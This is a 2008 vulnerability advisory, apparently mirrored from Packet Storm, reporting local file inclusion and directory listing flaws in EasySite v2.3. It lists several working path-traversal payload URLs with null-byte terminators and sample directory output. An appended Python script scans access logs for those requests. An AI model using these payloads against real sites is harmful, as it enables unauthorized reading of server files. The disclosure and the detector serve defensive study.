easysite-lfi.txt

22 Aug 2008 | Reported by SirGod | Type: packetstorm | Source: packetstormsecurity.com

Multiple remote vulnerabilities in EasySite v2.3, discovered by SirGod, allow local file inclusion and arbitrary viewing of folder contents.

`####################################################################  
[+] EasySite v2.3 Multiple Remote Vulnerabilities   
[+] Discovered By SirGod   
[+] www.mortal-team.org   
[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin ,ToxicBlood,MesSiAH,xZu,HrN  
####################################################################  
  
[+] Local File Inclusion  
  
http://localhost/www/index.php?module=Accueil&action=../../../../autoexec.bat%00  
http://localhost/modules/Module/index.php?module=../../../../autoexec.bat%00  
http://localhost/modules/Module/index.php?ss_module=../../../../autoexec.bat%00  
http://localhost/modules/Module/index.php?ss_action=../../../../autoexec.bat%00  
http://localhost/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00  
http://localhost/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00  
http://localhost/modules/Themes/index.php?module=../../../../autoexec.bat%00  
  
And many others...  
  
This will open autoexec.bat  
  
[+] Arbitrary View Folder Contents  
  
You can view folder contents, and the contents of files via LFI.  
  
http://localhost/www/index.php?module=../../../  
  
http://localhost/inc/vmenu.php?module=../../../  
  
This will open the C:/ directory and show all the files in C:/.  
  
Example :  
  
* BOOTSECT.BAK  
* BcBtRmv.log  
* IO.SYS  
* MSDOS.SYS  
* autoexec.bat  
* bootmgr  
* config.sys  
* grldr  
* hiberfil.sys  
* pagefile.sys  
  
####################################################################  
`
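
A defender-side check for the request patterns listed above, as an added example that is not part of the original advisory: it scans web access logs for the `module`, `action`, `ss_module` and `ss_action` parameters carrying `..` path segments, a null byte or an absolute path. The log lines are constructed samples, and the function names are illustrative.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Query parameters the advisory shows reaching the file-include path.
WATCHED = {"module", "action", "ss_module", "ss_action"}
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')

# Constructed access-log lines (combined format); addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Aug/2008:10:00:01 +0000] "GET /www/index.php?module=Accueil&action=index HTTP/1.1" 200 5120',
    '192.0.2.44 - - [22/Aug/2008:10:02:17 +0000] "GET /www/index.php?module=Accueil&action=../../../../autoexec.bat%00 HTTP/1.1" 200 312',
    '192.0.2.44 - - [22/Aug/2008:10:02:40 +0000] "GET /inc/vmenu.php?module=../../../ HTTP/1.1" 200 901',
]

def fully_decode(raw, rounds=3):
    """Percent-decode until stable so nested encoding cannot hide '../' or %00."""
    data = raw.encode("latin-1", "replace")
    for _ in range(rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data

def inspect_value(raw):
    """Return the reasons a parameter value looks like a path, not a module name."""
    value = fully_decode(raw).replace(b"\\", b"/")
    reasons = []
    if b"\x00" in value:
        reasons.append("null-byte")
    if b".." in value.split(b"/"):
        reasons.append("traversal")
    if value.startswith(b"/") or re.match(rb"[A-Za-z]:", value):
        reasons.append("absolute-path")
    return reasons

def scan_line(line):
    """Return (parameter, reason) pairs for one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    findings = []
    for pair in urlsplit(match.group(1)).query.split("&"):
        name, _, raw = pair.partition("=")
        if name.lower() in WATCHED:
            findings += [(name, reason) for reason in inspect_value(raw)]
    return findings

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scan_line(entry) or "clean", "<-", entry.split('"')[1])
```

Any hit on these parameters is worth triage, since a legitimate module or action name never needs a path separator, a null byte or a drive prefix.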

Vulners AI Score: 7.4 (High risk)